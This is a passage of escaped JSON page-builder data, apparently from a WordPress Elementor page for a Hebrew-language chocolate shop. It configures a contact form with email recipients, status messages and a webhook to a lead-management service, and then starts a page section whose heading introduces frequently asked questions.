\\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"chocolate4u\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34824&lm_key=fa721ea141794a3db374e600fc05ee2c\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b